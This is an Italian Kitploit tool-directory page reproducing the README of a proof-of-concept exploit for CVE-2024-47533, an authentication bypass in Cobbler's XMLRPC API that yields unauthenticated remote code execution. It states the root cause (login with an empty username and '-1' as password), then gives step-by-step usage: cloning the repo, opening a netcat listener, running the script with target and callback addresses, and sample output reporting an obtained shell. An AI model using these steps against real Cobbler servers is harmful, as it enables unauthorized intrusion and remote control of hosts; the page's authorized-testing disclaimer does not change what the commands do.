Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-47533-PoC — Exploit proof-of-concept per CVE-2024-47533, un bypass dell'autenticazione nell'API XMLRPC di Cobbler che porta a esecuzione di codice remoto non autenticata e reverse shell. | Kitploit
Strumenti/GitHubGitHub/00xcanelo/cve-2024-47533-poc
Autenticazione e AutorizzazioneExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHub00xcanelo/cve-2024-47533-poc

CVE-2024-47533-PoC

Exploit proof-of-concept per CVE-2024-47533, un bypass dell'autenticazione nell'API XMLRPC di Cobbler che porta a esecuzione di codice remoto non autenticata e reverse shell.

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-47533 – Bypass autenticazione Cobbler XMLRPC → Reverse Shell (RCE non autenticato)

📌 Riepilogo

Questo repository contiene un exploit Proof-of-Concept (PoC) per CVE-2024-47533,
un bypass critico dell'autenticazione nell'API XMLRPC di Cobbler che porta a esecuzione remota di codice (RCE) non autenticata.

L'exploit sfrutta il difetto del metodo login() dell'API XMLRPC per bypassare l'autenticazione e iniettare un comando di reverse shell tramite background_import().


⚠️ Disclaimer

Questo strumento è destinato solo a fini educativi, di ricerca e test di penetrazione autorizzati.
NON utilizzarlo su sistemi di cui non sei proprietario o per cui non hai esplicita autorizzazione scritta.
L'autore non si assume alcuna responsabilità per uso improprio o danni.


🛠 Dettagli tecnici

  • Tipo di vulnerabilità: Bypass autenticazione → RCE
  • Componente interessato: API XMLRPC di Cobbler
  • Vettore d'attacco: Rete
  • Privilegi richiesti: Nessuno
  • Interazione utente: Nessuna

Causa principale:
utils.get_shared_secret() restituisce erroneamente -1 a causa di una gestione errata delle letture di file in modalità binaria con una codifica, consentendo l'autenticazione con un nome utente vuoto e -1 come password.

Impatto:
Un attaccante può:

  • Ottenere accesso API a livello di amministratore
  • Iniettare comandi di sistema arbitrari nei template di Cobbler
  • Generare una reverse shell sul target

🚀 Utilizzo

1️⃣ Clona il repository

root@kitploit:~
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC

2️⃣ Imposta un listener

Sulla tua macchina attaccante:

root@kitploit:~
nc -lvnp 4444

3️⃣ Esegui l'exploit

root@kitploit:~
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>

Esempio:

root@kitploit:~
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444

📂 Struttura dei file

root@kitploit:~
.
├── CVE-2024-47533.py  # Script exploit reverse shell
└── README.md          # Documentazione

📸 Output di esempio

root@kitploit:~
[*] Target: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Connessione a Cobbler...
[*] Autenticazione...
[*] Esecuzione exploit...
[+] Exploit inviato! Shell ottenuta 🔥.

🧑‍💻 Autore

00xCanelo
Profilo GitHub


📚 Riferimenti

  • NVD: CVE-2024-47533
  • Progetto Cobbler su GitHub
Scarica lo strumento